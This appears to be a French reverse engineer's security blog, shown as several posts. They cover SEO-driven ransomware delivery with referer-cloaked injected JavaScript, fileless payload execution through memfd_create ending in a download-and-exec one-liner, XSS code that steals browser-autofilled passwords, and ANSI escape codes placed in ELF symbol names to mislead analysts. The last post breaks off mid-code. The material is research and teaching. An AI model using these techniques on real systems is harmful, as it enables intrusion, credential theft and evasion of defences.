Le journal d'un reverser

Friday, May 29, 2020

When ransomware does SEO

Last night a friend called me. Usual story: someone he knows got cryptolocked, it's tragic, the usual tears and screams, yadda yadda.

Where this particular story gets interesting is how the victim got infected. Usually, ransomware is deployed through mail attachments. This one was not really delivered to the victim; it was more the victim who fetched the ransomware himself. How is that possible?

We'll see: it's a tragedy in 3 steps.

I chose to write this blogpost because of this unusual delivery mechanism: using SEO to trick people into downloading fake documents that carry malware is a funny move.

## Step 1: when an innocent website gets infected

First, the pirate infects a website. In our case, it's a French restaurant, www.--REDACTED--.net. At first glance, nothing looks suspicious. The pirate adds a lot of pages to the blog section, with targeted content built around the word "modèle" (model, as in document template):

modèle nez rhinoplaste
modèle lettre de réclamation freebox
modèle pestel d'une entreprise
...

All of those pages include a link to a JavaScript file: "http://www.--REDACTED--.net/?aca30b6=223500"

The first tricky part is here: you can download the js file, and it's empty. So how does this thing work? The infected website checks your referer. If you come with a Google referer, the js document gets really interesting:

Technically speaking:

$ curl 'http://www.--REDACTED--.net/?aca30b6=223500'

(nothing, empty page)

gives you an empty result, but:

$ curl --referer "google/?q=recherche.de.mandat" 'http://www.--REDACTED--.net/?aca30b6=223500'

(data is fetched..)

The javascript file is this one:

function remove(elem) {
  if (!elem) return;
  elem.parentNode.removeChild(elem);
}
if (!document.all) document.all = document.getElementsByTagName("*");

for (i = 0; i < document.all.length; i++) {
 if (document.all[i].tagName == "BODY" || document.all[i].tagName == "HTML") { } 
else { remove(document.all[i]);} 
} 
document.body.innerHTML = '<html><head><title>exemple de mandat gestion de projet</title>(and all HTML code of page goes here)...

And that brings us to step 2. This JavaScript wipes every HTML tag and rewrites the whole page. The page title is precisely the search query made by the victim.

The beauty of checking the Google referer is that the legitimate owner will never see a problem: you don't browse your own site through a Google search... The Google referer trick is nothing new, but it's still really effective.
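The curl comparison above can be automated. Here is a minimal Python sketch, assuming the only thing we care about is whether the body changes with the Referer header. The names `looks_cloaked` and `urllib_fetch` are hypothetical helpers, not something taken from the infected site or from any tool, and the default referer string is just an example.

```python
import urllib.request
from typing import Callable, Optional

# Hypothetical helper names, for illustration only.
# A fetcher takes (url, referer) and returns the response body as bytes.
# It is injected so the comparison logic can be tried without any network.
Fetcher = Callable[[str, Optional[str]], bytes]


def looks_cloaked(fetch: Fetcher, url: str,
                  referer: str = "https://www.google.com/search?q=test") -> bool:
    """Return True when the body differs depending on the Referer header."""
    plain = fetch(url, None)
    from_search = fetch(url, referer)
    return plain != from_search


def urllib_fetch(url: str, referer: Optional[str] = None) -> bytes:
    """Real fetcher built on the standard library (performs a network request)."""
    request = urllib.request.Request(url)
    if referer:
        request.add_header("Referer", referer)
    with urllib.request.urlopen(request, timeout=10) as response:
        return response.read()
```

A page with dynamic content (timestamps, ads) would also differ between two requests, so a positive result is only a hint that deserves a manual look.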

## Step 2: a so innocent forum

Now look at this beautiful site: it's not a restaurant anymore, it looks like a forum. Nice user Fluffy asks for the exact model searched for (once again, the Google query), and Admin answers with a link to the doc. Fluffy says thanks, soooo legit.

From the victim's side, nothing looks suspicious:

you search for a model of something
you click on a Google link
you land on a forum with a link to the doc you searched for
--> I dare anybody not to click the link at this point!

This is why this attack is so effective. The pirates don't send mail attachments; they do SEO and wait for victims to fall into the trap. (A sort of watering hole attack?)

And you guessed it! This is not a document. This is a zip containing a .js file which downloads the final piece of the puzzle. The name of the .js file? Exactly the searched terms.

The .js file is obfuscated:

but you can recreate the real payload quite easily (no crypto, just the payload encoded twice):

## Step 3: the final stage of the attack

This is the last script:

Now, the victim will download the last stage of the attack. As you can see, the victim generates a random number

Ua88 = Math.random().toString()["substr"](2,70+30);

and the subsequent download is checked against this key. The lbhdqisaoetysdwz= variable name changes for each download. There are other checks to bypass to get the final payload, but it's always the same things: timers, HTTP header checks, and so on.

## Conclusion

I wrote this blogpost because I had never seen this kind of infection before. The legitimate user searches for something, and the pirates have paved the whole way for him to get lost...

A quick Google search with well-chosen terms shows that many more blogs are infected with those models:

Another one:

Because when you know where to look, you find a lot of those sites. Fun fact: all commas are changed to backticks for an unknown reason (maybe because the pirate doesn't know how to escape commas 😃 ).

And as usual, the VirusTotal shame for the js file

One last note about the victim: he had backups, and his antivirus killed the ransomware after about ten files had been encrypted. That's all for today, and be safe.

Wednesday, February 20, 2019

Executing payload without touching the filesystem (memfd_create syscall)

Sometimes you gain code execution on a target and you want to leverage it into a full metasploit payload (or any other relevant binary). If you have access to the filesystem, you can copy the payload and launch it. But defenders can mount the disk with the noexec flag, and sometimes you just don't have the rights to write files. Wouldn't it be nice to have a download_and_exec_in_memory(payload)?

0/ Intro

Since kernel 3.17 you can use the memfd_create syscall. As the name says, it creates a file descriptor in memory. If you're an attacker, you can use this nice syscall to execute binaries without touching any file in the filesystem! (except /proc).

This is not something new, you can read documentation here:

1/ A bit of syscall and python

First, we look up the syscall number and its flags:

mitsurugi@dojo:~/blog$ grep memfd_create /usr/include/x86_64-linux-gnu/asm/unistd_64.h
#define __NR_memfd_create 319
mitsurugi@dojo:~/blog$ cat /usr/include/linux/memfd.h
#ifndef _LINUX_MEMFD_H
#define _LINUX_MEMFD_H
/* flags for memfd_create(2) (unsigned int) */
#define MFD_CLOEXEC  0x0001U
#define MFD_ALLOW_SEALING 0x0002U

#endif /* _LINUX_MEMFD_H */
mitsurugi@dojo:~/blog$

The MFD_CLOEXEC flag is interesting (the fd is closed on exec).

Python can't invoke a raw syscall directly. Fortunately we have ctypes and a libc, so in order to create the memfd, we can just do this:

#! /usr/bin/python3

import ctypes
import ctypes.util
import time

libc = ctypes.cdll.LoadLibrary(ctypes.util.find_library('c'))
# 319 = __NR_memfd_create on x86_64, 1 = MFD_CLOEXEC
fd = libc.syscall(319,b'Mitsurugi', 1)
assert fd >= 0
time.sleep(60)  #sleep is just here to let us list /proc file

And we can see that we have a new fd in our process:

mitsurugi@dojo:~/blog$ ps ax | grep memfd
 6237 pts/5    S+     0:00 /usr/bin/python3 ./memfd1.py
mitsurugi@dojo:~/blog$ ls -l /proc/6237/fd
total 0
lrwx------ 1 mitsurugi mitsurugi 64 févr. 20 10:40 0 -> /dev/pts/5
lrwx------ 1 mitsurugi mitsurugi 64 févr. 20 10:40 1 -> /dev/pts/5
lrwx------ 1 mitsurugi mitsurugi 64 févr. 20 10:40 2 -> /dev/pts/5
lrwx------ 1 mitsurugi mitsurugi 64 févr. 20 10:40 3 -> /memfd:Mitsurugi (deleted)
mitsurugi@dojo:~/blog$

The "(deleted)" string appears here; just don't pay attention to it.
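On Python 3.8 and later, the standard library exposes this syscall as os.memfd_create (Linux only), which avoids hard-coding the x86_64 syscall number. A minimal sketch of the same experiment follows; `memfd_link_target` is a hypothetical helper name, and it returns None instead of failing when the call or /proc is not available.

```python
import os


def memfd_link_target(name="Mitsurugi"):
    """Create an in-memory fd and return what /proc/self/fd says it points to.

    Returns None when os.memfd_create is missing (non-Linux, Python < 3.8)
    or when the call or the /proc lookup is refused by the system.
    """
    if not hasattr(os, "memfd_create"):
        return None
    try:
        fd = os.memfd_create(name, os.MFD_CLOEXEC)
    except OSError:
        return None
    try:
        return os.readlink("/proc/self/fd/%d" % fd)
    except OSError:
        return None
    finally:
        os.close(fd)


if __name__ == "__main__":
    print(memfd_link_target())
```

The ctypes version stays useful on older interpreters, which is what you tend to find on a target.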

2/ Ready to play!

The next part is super easy. Just copy bytes to the fd, and execv() it. To keep the program clear, I just copy the /usr/bin/xeyes binary to the memfd.

#! /usr/bin/python3

import ctypes
import ctypes.util
import os

libc = ctypes.cdll.LoadLibrary(ctypes.util.find_library('c'))
# 319 = __NR_memfd_create on x86_64, 1 = MFD_CLOEXEC
fd = libc.syscall(319,b'Mitsurugi', 1)
assert fd >= 0

with open('/usr/bin/xeyes', mode='rb') as f1:
    with open('/proc/self/fd/'+str(fd), mode='wb') as f2:
        f2.write(f1.read())

# Execute the in-memory file through its /proc path; argv[0] is left empty
os.execv('/proc/self/fd/'+str(fd), [""])

And it works flawlessly. We could download the payload from anywhere on the internet instead of copying a file, detach from the controlling terminal with setsid(), use dup2() to bind /dev/null to fds 0, 1, 2 and so on... (this is left as an exercise to the reader ;) ).

3/ From the defender's point of view

3/1/ Blocking with noexec doesn't work

My first thought was to use noexec on the /proc directory. Unfortunately, it doesn't help: all examples in this blogpost have been tested and verified with noexec:

mitsurugi@dojo:~/blog$ mount | grep ^proc
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
mitsurugi@dojo:~/blog$

3/2/ Detecting bad behavior

If we look closely, we can spot a few things:

mitsurugi@dojo:~/blog$ ps ax | grep 6601
 6601 pts/6    S      0:00
 6604 pts/6    S+     0:00 grep 6601
mitsurugi@dojo:~/blog$

The process has no name at all (!), most likely because we passed an empty argv[0] to execv(). In some situations this could be seen as an advantage. If you are concerned, just use prctl() to rename your process.

With the help of lsof we can find something unusual:

mitsurugi@dojo:~/blog$ lsof | grep txt | grep 6601
3     6601     mitsurugi  txt    REG    0,5   28744    224284 /memfd:Mitsurugi (deleted)
mitsurugi@dojo:~/blog$
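The lsof check can be turned into a small scan. Below is a minimal Python sketch, assuming that a process started this way shows an exe link beginning with "/memfd:" (as in the lsof output above). `find_memfd_processes` is a hypothetical helper name, and the `proc_root` parameter only exists so the function can be pointed at a fake directory.

```python
import os


def find_memfd_processes(proc_root="/proc"):
    """Return sorted (pid, exe_target) pairs whose executable lives in a memfd."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue  # not a pid directory
        try:
            target = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:
            continue  # kernel thread, vanished process, or permission denied
        if target.startswith("/memfd:"):
            hits.append((int(entry), target))
    return sorted(hits)


if __name__ == "__main__":
    for pid, target in find_memfd_processes():
        print(pid, target)
```

Run as an unprivileged user it only sees your own processes; reading every exe link needs root.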

3/3/ recovering the file

But can we recover the binary bytes from the fd? Remember that we used the MFD_CLOEXEC flag. The file descriptor is closed:

mitsurugi@dojo:~/blog$ cat /proc/6601/fd/3 > output
cat: /proc/6601/fd/3: No such device or address
mitsurugi@dojo:~/blog$

So, no tracks at all? Could it be the perfect backdoor? Not so fast: you can always cat /proc/<pid>/exe to get the code back:

mitsurugi@dojo:~/blog$ cat /proc/6601/exe | md5sum
443bdd422a4437e319d3b86330990c45  -
mitsurugi@dojo:~/blog$ cat /usr/bin/xeyes | md5sum
443bdd422a4437e319d3b86330990c45  -
mitsurugi@dojo:~/blog$

You could still copy encrypted code into the fd and launch it with the key as an argument, but someone could always dump the process memory and read the bytes back. If code runs on the target machine, an analyst can get it.

4/ Conclusion

Here is a fun way to launch a process without touching the file system, bypassing the noexec flag.
Here is the one-liner; you just have to host the payload, and it works:

python3 -c 'import ctypes,ctypes.util,os,requests; libc = ctypes.cdll.LoadLibrary(ctypes.util.find_library("c"));fd = libc.syscall(319,b"Mitsurugi", 1);f2=open("/proc/self/fd/"+str(fd),"wb");f2.write(requests.get("http://127.0.0.1:8000/payload").content);f2.close();os.execv("/proc/self/fd/"+str(fd), [""])'

Wednesday, June 20, 2018

Credential stealing with XSS without user interaction

0/ Intro

XSS is everywhere, on a lot of websites. It has been called the most underrated security vulnerability.

On one hand, you can pop up an alert('PWNED'), but an alert() in your browser is not really something to fear.

On the other hand, people tend to store logins and passwords in the browser. You log on to intranet.corp and Firefox asks to save the password. You click yes.

After a chat with @XeR, we figured out that we can combine both to silently steal your credentials with a simple XSS, without user interaction.

1/ Show me the code, or die()!

Our login form for intranet.corp:

<HTML>
  <BODY>
    <form>
        <input type="text" name="user" />
        <input type="password" name="pass" />
        <input type="submit" />
    </form>
  </BODY>
  <!-- This is propa codaz -->
</HTML>

Log in once, store the password in the browser:

The browser has saved the password. If you return to the login.html page, the user and pass fields are filled in.

2/ Attack

Let's say we have a stored XSS in the website. An innocent user surfs to this page. This page includes evil JavaScript:

var form = document.createElement("form");
var text = document.createElement("input");
var pass = document.createElement("input");

text.id   = "login";
text.name = "login";
text.type = "text";

pass.id   = "password";
pass.name = "password";
pass.type = "password";

form.appendChild(text);
form.appendChild(pass);

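window.addEventListener("load", function() {
 console.log("evil loader");
 // The form has to be attached to the document, otherwise the browser has nothing to autofill
 document.body.appendChild(form);
 window.setTimeout(function() {
  alert(text.value + ":" + pass.value);
 }, 1000);
});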

And "voilà". The JavaScript adds a form, Firefox autocompletes the values, then our little js reads the values and alert()s them to the screen (possibilities are endless here).

The attacker can now log in to intranet.corp. Note that the user doesn't need to be phished or tricked into entering information in a fake form. The js code will nicely ask the browser to hand over the login/pass.

3/ Best parts

There is no user interaction in this attack. The user doesn't have to type login and pass in a form, he just has to trigger the XSS[1].
This has nothing to do with cookies, so HTTPS or the HttpOnly flag won't help. We want the pass, we have the pass.
Moar fun, the user doesn't need to be logged in! If the XSS is triggered, boom, credz go to the attacker.
If you find a stored XSS on a site with many users, you raise your chances of getting credz, just wait.

99/ Outro

Be nice to others, and in case you wonder, I don't use the password manager of my browser.
Thanks to @XeR for the chat which led to this.

8 times down. 9 times up!

0xMitsurugi

[1] Finding the XSS is an exercise left to the reader

Tuesday, February 20, 2018

Fun with function names. Where resolving goes wild.

Last night, I was looking through C code and ARM assembly.
I was wondering: when a binary calls a function inside a shared lib, how does the linker know where the code resides in the library?
The second question was: can we change the name of a function in both a binary and a library and have everything still work afterwards?
And third: can we use some fancy characters in function names? Like changing the color of the xterm when running objdump or gdb on the binary? You know ANSI escape codes? What if we put ANSI escape codes in a function name?

1/ Start smoothly

My computer is currently a raspberry pi. Everything here has been tested on this architecture. It should work everywhere, but your mileage may vary.

Let's take an example:

mitsurugi@raspi:~/resolv_func/$ cat libpoem.h
int this_is_an_external_func_in_a_lib();
mitsurugi@raspi:~/resolv_func/$ cat libpoem.c
/* Compile with gcc -shared -o libpoem.so libpoem.c */
#include <stdio.h>

int this_is_an_external_func_in_a_lib() {
 puts("ARM disassembly");          //5
 puts("Reading symbol resolving"); //7
 puts("In the cold of night");     //5
 return 42;
}
mitsurugi@raspi:~/resolv_func/$ cat proj.c
/* gcc -o proj -Wl,-rpath=. -L. -I. -l poem proj.c */
#include "libpoem.h"

int main() {
 int ret;
 ret=this_is_an_external_func_in_a_lib();
 return ret;
}
mitsurugi@raspi:~/resolv_func/$

We can compile and run this binary:

mitsurugi@raspi:~/resolv_func/blog$ gcc -shared -o libpoem.so libpoem.c
mitsurugi@raspi:~/resolv_func/blog$ gcc -o proj -Wl,-rpath=. -L. -I. -l poem proj.c
mitsurugi@raspi:~/resolv_func/blog$ ldd proj
 linux-vdso.so.1 (0x7efd9000)
 libpoem.so => ./libpoem.so (0x76f33000)
 libc.so.6 => /lib/arm-linux-gnueabihf/libc.so.6 (0x76e30000)
 /lib/ld-linux-armhf.so.3 (0x76f57000)
mitsurugi@raspi:~/resolv_func/blog$ ./proj 
ARM disassembly
Reading symbol resolving
In the cold of night
mitsurugi@raspi:~/resolv_func/blog$

The dynamic linker searches for the lib in the current path (which is not really secure, but that's out of the scope of this blogpost).

This binary runs fine, as expected.

2/ Symbol resolution

The question is: how does the binary know where to look for the this_is_an_external_func_in_a_lib() call? It's obviously related to string comparison:

mitsurugi@raspi:~/resolv_func/blog$ strings proj libpoem.so | grep external
this_is_an_external_func_in_a_lib
this_is_an_external_func_in_a_lib
this_is_an_external_func_in_a_lib
this_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

Well, if we have the string this_is_an_external_func_in_a_lib in both the binary and the library, maybe it's because they are associated?

Proof: if you alter one of these strings, the program doesn't work anymore:

mitsurugi@raspi:~/resolv_func/blog$ sed s/this_is_an_external_func_in_a_lib/AAAA_is_an_external_func_in_a_lib/g proj > proj2
mitsurugi@raspi:~/resolv_func/blog$ chmod +x proj2
mitsurugi@raspi:~/resolv_func/blog$ ldd proj2
 linux-vdso.so.1 (0x7ed45000)
 libpoem.so => ./libpoem.so (0x76eed000)
 libc.so.6 => /lib/arm-linux-gnueabihf/libc.so.6 (0x76dea000)
 /lib/ld-linux-armhf.so.3 (0x76f11000)
mitsurugi@raspi:~/resolv_func/blog$ ./proj2
./proj2: symbol lookup error: ./proj2: undefined symbol: AAAA_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

The same happens if you change the function in the library:

mitsurugi@raspi:~/resolv_func/blog$ mv libpoem.so libpoem.so.ori
mitsurugi@raspi:~/resolv_func/blog$ sed s/this_is_an_external_func_in_a_lib/AAAA_is_an_external_func_in_a_lib/g libpoem.so.ori > libpoem.so
mitsurugi@raspi:~/resolv_func/blog$ chmod +x libpoem.so
mitsurugi@raspi:~/resolv_func/blog$ ldd proj                //this is the unaltered binary
 linux-vdso.so.1 (0x7ea81000)
 libpoem.so => ./libpoem.so (0x76ede000)
 libc.so.6 => /lib/arm-linux-gnueabihf/libc.so.6 (0x76ddb000)
 /lib/ld-linux-armhf.so.3 (0x76f02000)
mitsurugi@raspi:~/resolv_func/blog$ ./proj 
./proj: symbol lookup error: ./proj: undefined symbol: this_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

Seems logical: it searches for a function by its name.

But wait, what if we change the name in BOTH? Would it work? The binary calls AAAA_is_an_external_func_in_a_lib(), the linker steps through all linked libraries, finds libpoem.so, opens it, reads the function names, finds it and calls it. Does it work?

mitsurugi@raspi:~/resolv_func/blog$ ./proj2 
./proj2: symbol lookup error: ./proj2: undefined symbol: AAAA_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

Still a fail, although we have the same name in library and binary:

mitsurugi@raspi:~/resolv_func/blog$ strings proj2 libpoem.so | grep external_func
AAAA_is_an_external_func_in_a_lib
AAAA_is_an_external_func_in_a_lib
AAAA_is_an_external_func_in_a_lib
AAAA_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

3/ Read The Freaky Manual (If it exists...)

When you're looking for something, you can read the manual. But in this case it won't help, because there is no manual.
When you google for symbol resolution, you end up with a lot of blog posts talking about PLT/GOT stuff. Very interesting (yes, read them, it's very valuable), but there is still magic in those blogposts. (In French: https://www.segmentationfault.fr/linux/role-plt-got-ld-so/ ).

And how do those blog posts explain how resolution is done?

The previous blogpost just says: "it's a long and complicated code, but in the end, you get the address". I don't like magic in computing.

4/ No magic. Just show me.

Here are the main links which could help you:

I'll try to summarize things. First, we have a hash section in ELF files:

mitsurugi@raspi:~/resolv_func/blog$ readelf -x .gnu.hash libpoem.so

Hex dump of section '.gnu.hash':
  0x00000118 03000000 08000000 02000000 06000000 ................
  0x00000128 890020b1 00c44289 08000000 0c000000 .. ...B.........
  0x00000138 0f000000 00af34e8 4245d5ec dea1eacc ......4.BE......
  0x00000148 bbe3927c beda571b d871581c b98df10e ...|..W..qX.....
  0x00000158 76543c94 ead3ef0e 59ef9779          vT<.....Y..y

mitsurugi@raspi:~/resolv_func/blog$

This section contains a header, bloom filters, and hashes. Libc developers want binaries to run fast. When you resolve symbols the naive way, you have to step through every symbol and do a strcmp. This is slow, so the developers added lots of improvements.

I wrote a parser of .gnu.hash sections (values are displayed both in little and big endian):

mitsurugi@raspi:~/resolv_func/blog$ ./hashparse.py libpoem.so
*** Get GNU HASH section for libpoem.so
[+] Ok, one line. Good
[+] GNU HASH mapping fits perfectly disk and memory layout
    starting at 0x00000118
    and size is 0x00004c long
*** Extracting .gnu.hash
*** Parsing...
[+] Header
3 hash buckets              //we'll use this number later
8 symndx
2 bloom masks
6 bloomshift (minimum 6)
[+] Part 2 - bloom masks
 Mask 0 : 0xb1200089L  | 0x890020b1L
 Mask 1 : 0x8942c400L  | 0xc44289
[+] Part 3 - N Buckets of hash
 Bucket 0 : 0x8  | 0x8000000
 Bucket 1 : 0xc  | 0xc000000
 Bucket 2 : 0xf  | 0xf000000
[+] Part 4 - Hashes
 Hash 0 : 0xe834af00L  | 0xaf34e8
 Hash 1 : 0xecd54542L  | 0x4245d5ec
 Hash 2 : 0xcceaa1deL  | 0xdea1eaccL      //pay attention to this hash
 Hash 3 : 0x7c92e3bb  | 0xbbe3927cL
 Hash 4 : 0x1b57dabe  | 0xbeda571bL
 Hash 5 : 0x1c5871d8  | 0xd871581cL
 Hash 6 : 0xef18db9  | 0xb98df10eL
 Hash 7 : 0x943c5476L  | 0x76543c94
 Hash 8 : 0xeefd3ea  | 0xead3ef0eL
 Hash 9 : 0x7997ef59  | 0x59ef9779
mitsurugi@raspi:~/resolv_func/blog$

4/1/ First speedup: Hash table.

To quickly find an object in a list, use a hashtable. Hashtables are a convenient way to sort and find items in a list. The hash function used in the resolver is the djbx33a one:

static uint_fast32_t
dl_new_hash (const char *s)
{
  uint_fast32_t h = 5381;
  for (unsigned char c = *s; c != '\0'; c = *++s)
    h = h * 33 + c;
  return h & 0xffffffff;
}

We can easily calculate the hash of our function:

mitsurugi@raspi:~/resolv_func/blog$ ./dl_new_hash.py this_is_an_external_func_in_a_lib
[+] Calculating hash for this_is_an_external_func_in_a_lib
Output is 0xCCEAA1DF
mitsurugi@raspi:~/resolv_func/blog$

We can find our hash in the .gnu.hash section: 0xcceaa1de (minus the lowest bit, which is not significant when the resolver compares hashes because it is used to mark the end of a hash chain; I spent too much time on this detail).
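The dl_new_hash.py script is not shown here. A reimplementation of the C function above could look like the following sketch; the function name mirrors the C one, while `same_stored_hash` is a hypothetical helper illustrating the "ignore the lowest bit" comparison.

```python
def dl_new_hash(name: str) -> int:
    """Python port of the C dl_new_hash shown above (h = h * 33 + c, start 5381)."""
    h = 5381
    for byte in name.encode("utf-8"):
        h = (h * 33 + byte) & 0xFFFFFFFF  # keep the value on 32 bits
    return h


def same_stored_hash(computed: int, stored: int) -> bool:
    """Compare a computed hash with a value read from .gnu.hash, ignoring bit 0."""
    return (computed | 1) == (stored | 1)


if __name__ == "__main__":
    import sys
    for symbol in sys.argv[1:]:
        print("%s: 0x%08X" % (symbol, dl_new_hash(symbol)))
```

Masking at every step rather than once at the end gives the same result and keeps the intermediate integer small.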

So, if you change the name of the function and its associated hash, it should work? No, not so easily. This is a hash table, you have to land in the same bucket. Long story short, your (new_hash % nbuckets) should be equal to (old_hash % nbuckets). nbuckets equals 3 in this library. Let's work with this number:

this_is_an_external_func_in_a_lib : hash(func)%3 = 0xCCEAA1DF%3 = 0
AAAA_is_an_external_func_in_a_lib : hash(func)%3 = 0xEEA9C6CB%3 = 1 -> Not the same bucket, won't work
BAAA_is_an_external_func_in_a_lib : hash(func)%3 = 0xFFE18ACC%3 = 0 -> Good.

So, we change the name of the function, and change the hash to 0xFFE18ACC. Will it work? Still not, there is one last change to make.
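Picking a replacement name by hand gets tedious, so the bucket rule can be scripted. This is a minimal sketch under the rule stated above (same hash modulo nbuckets); `same_bucket_names` and the candidate prefixes are hypothetical, and dl_new_hash is a Python port of the C function shown earlier.

```python
def dl_new_hash(name: str) -> int:
    """Python port of the dl_new_hash C function quoted in this post."""
    h = 5381
    for byte in name.encode("utf-8"):
        h = (h * 33 + byte) & 0xFFFFFFFF
    return h


def same_bucket_names(old_name, candidates, nbuckets):
    """Keep the candidates that land in the same hash bucket as old_name."""
    wanted = dl_new_hash(old_name) % nbuckets
    return [name for name in candidates
            if dl_new_hash(name) % nbuckets == wanted]


suffix = "_is_an_external_func_in_a_lib"
# Candidate prefixes are arbitrary; same length as "this" so the strings fit in place.
candidates = [prefix + suffix for prefix in ("AAAA", "BAAA", "CAAA", "DAAA")]
usable = same_bucket_names("this" + suffix, candidates, nbuckets=3)

if __name__ == "__main__":
    for name in usable:
        print("0x%08X %s" % (dl_new_hash(name), name))
```

Keeping the new name exactly as long as the old one matters, since the bytes are patched in place in the string table.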

4/2/ Second speedup added: Bloom filter

Using hashes is a big speedup, but the libc maintainers added another big boost: a bloom filter. Its goal is to quickly reject unknown symbols. This bloom filter is built from bits of the symbol hash, and is used as a fast rejection step. If the bloom filter fails, the symbol is not in the file. If the bloom filter passes, the symbol may or may not be in the file. Apparently, this causes a huge speedup in symbol resolution. That's clever, but I have to change my function name.

If you want to bypass this bloom filter, you can recalculate it. Or you can set all bits to 1, which means: always pass. I'm not a programmer, I want things to work the way I want. So let's set all bits to 1 and not try to recalculate anything.

And after the bloom filter change, it will work, because the linker will say:

does it pass the bloom filter? Yes
does it have a hash? Yes
in the hash bucket, does a function with the same name exist? Yes
--> Symbol resolution is done, code is here, work your way.
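To see why the original masks reject the new name and why all-ones masks accept everything, here is a minimal Python sketch of the bloom test as glibc does it for a 32-bit ELF: one mask word is selected by the hash, then two bits (from h and from h >> shift) must both be set. `bloom_may_contain` is a hypothetical name; the mask values and the shift of 6 are the ones read from the .gnu.hash dump above, taken as little-endian words.

```python
def bloom_may_contain(h, masks, shift, word_bits=32):
    """Return False when the bloom filter proves the hash is absent.

    masks     : bloom mask words read from .gnu.hash
    shift     : the bloom shift from the section header
    word_bits : 32 for a 32-bit ELF (assumption matching the raspberry pi here)
    """
    # glibc uses a bitwise AND with (len(masks) - 1); the count is a power of two,
    # so the modulo below selects the same word.
    word = masks[(h // word_bits) % len(masks)]
    bit1 = 1 << (h % word_bits)
    bit2 = 1 << ((h >> shift) % word_bits)
    return bool(word & bit1) and bool(word & bit2)


original_masks = [0xB1200089, 0x8942C400]
patched_masks = [0xFFFFFFFF, 0xFFFFFFFF]

if __name__ == "__main__":
    for label, h in (("old name", 0xCCEAA1DF), ("new name", 0xFFE18ACC)):
        print(label,
              bloom_may_contain(h, original_masks, 6),
              bloom_may_contain(h, patched_masks, 6))
```

Setting every bit turns the filter into a no-op: nothing is rejected early any more, so lookups of unknown symbols get slower but still give the right answer.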

4/3/ First win:

We have to change the function name: easy, we use BAAA_is_an_external_func_in_a_lib
We have to break the bloom filter: easy, set all bits to 1
We have to change the hash value: easy, just take care of the bucket.

After some hex editing (all bytes have been changed by hand):

mitsurugi@raspi:~/resolv_func/blog$ readelf -x .gnu.hash libpoem.so

Hex dump of section '.gnu.hash':
  0x00000118 03000000 08000000 02000000 06000000 ................
  0x00000128 ffffffff ffffffff 08000000 0c000000 ................
  0x00000138 0f000000 00af34e8 4245d5ec cc8ae1ff ......4.BE......
  0x00000148 bbe3927c beda571b d871581c b98df10e ...|..W..qX.....
  0x00000158 76543c94 ead3ef0e 59ef9779          vT<.....Y..y

mitsurugi@raspi:~/resolv_func/blog$

Look at the bloom filter (all bits are 1) and at the changed hash.
And now, it works like a charm!

mitsurugi@raspi:~/resolv_func/blog$ ./proj2
ARM disassembly
Reading symbol resolving
In the cold of night
mitsurugi@raspi:~/resolv_func/blog$ gdb -q proj2 
Reading symbols from proj2...(no debugging symbols found)...done.
gdb$ disass main
Dump of assembler code for function main:
   0x000006ac <+0>: push {r7, lr}
   0x000006ae <+2>: sub sp, #8
   0x000006b0 <+4>: add r7, sp, #0
   0x000006b2 <+6>: blx 0x584 <BAAA_is_an_external_func_in_a_lib@plt>
   0x000006b6 <+10>: str r0, [r7, #4]
   0x000006b8 <+12>: ldr r3, [r7, #4]
   0x000006ba <+14>: mov r0, r3
   0x000006bc <+16>: adds r7, #8
   0x000006be <+18>: mov sp, r7
   0x000006c0 <+20>: pop {r7, pc}
End of assembler dump.
gdb$

As you can see, I'm calling the function BAAA_is_an_external_func_in_a_lib(), and it works.

mitsurugi@raspi:~/resolv_func/blog$ strings proj2 libpoem.so | grep BAAA
BAAA_is_an_external_func_in_a_lib
BAAA_is_an_external_func_in_a_lib
BAAA_is_an_external_func_in_a_lib
BAAA_is_an_external_func_in_a_lib
mitsurugi@raspi:~/resolv_func/blog$

We know how to change a function name inside a binary and its lib without breaking anything!

5/ Now the fun part!

Ok, let's write a quick python patcher called patch.py.
You can use anything in the range \x01-\xff in a function name. Changing a single character in a function name is not fun. We can be good boyz (or girlz) and use internationalization: write UTF-8, and be happy with it. But do you know that your xterm interprets escape sequences? \e]34; will print everything in black. Let's write black on black and confuse reversers.

5/1/ Fun with ANSI escape code

We can use a function name containing ANSI escape codes. ANSI escape codes can be used to send a BEEP, blink characters, change the xterm title, change colors, and so on. Here is the fun part, where we change the xterm title when printing the function name:

Little known fact: An evil binary can rename your xterm while being debugged. Blogpost incoming.
Hours of fun: disassembly printed black on black, different functions with same name, and so on. pic.twitter.com/xVTV1ojuWS
(Mitsurugi Heishiro, @0xmitsurugi, February 16, 2018)

Fun, but can we do better? ANSI escape codes can move the cursor backward.
So we can overwrite the function name:

Reading symbols from crack...(no debugging symbols found)...done.
(gdb) disass main
Dump of assembler code for function main:
   0x00000688 <+0>: push {r7, lr}
   0x0000068a <+2>: add r7, sp, #0
   0x0000068c <+4>: blx 0x53c <calling@plt>
   0x00000690 <+8>: movs r3, #0
   0x00000692 <+10>: mov r0, r3
   0x00000694 <+12>: pop {r7, pc}
End of assembler dump.
(gdb) q
mitsurugi@raspi:~/resolv_func/blog$

and the library says:

mitsurugi@raspi:~/resolv_func/blog$ nm libcrack.so | grep ' T '
000004fc T calling
0000050a T calling
00000518 T calling
00000528 T _fini
000003fc T _init
mitsurugi@raspi:~/resolv_func/blog$

Three functions with the same name?!?! Which one is the good one? You can spend a lot of time in this crackme with static analysis only.

Those functions are different. Their names are A\x1b[1Dcalling, B\x1b[1Dcalling and C\x1b[1Dcalling. The \x1b[1D sequence moves the cursor back by 1 char, so the first char gets overwritten.
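To convince yourself without a crackme at hand, the effect can be simulated. The sketch below is a deliberately tiny terminal model that only understands the "cursor back" sequence (ESC [ n D); `render` is a hypothetical helper, and real terminals handle many more sequences than this.

```python
import re

# Matches only the CSI "cursor back" sequence: ESC [ <count> D
CSI_CURSOR_BACK = re.compile(r"\x1b\[(\d*)D")


def render(text):
    """Return what a terminal line would show, handling only cursor-back moves."""
    line = []   # characters currently visible on the line
    col = 0     # cursor column
    pos = 0     # read position in the input
    while pos < len(text):
        match = CSI_CURSOR_BACK.match(text, pos)
        if match:
            count = int(match.group(1) or "1")
            col = max(0, col - count)
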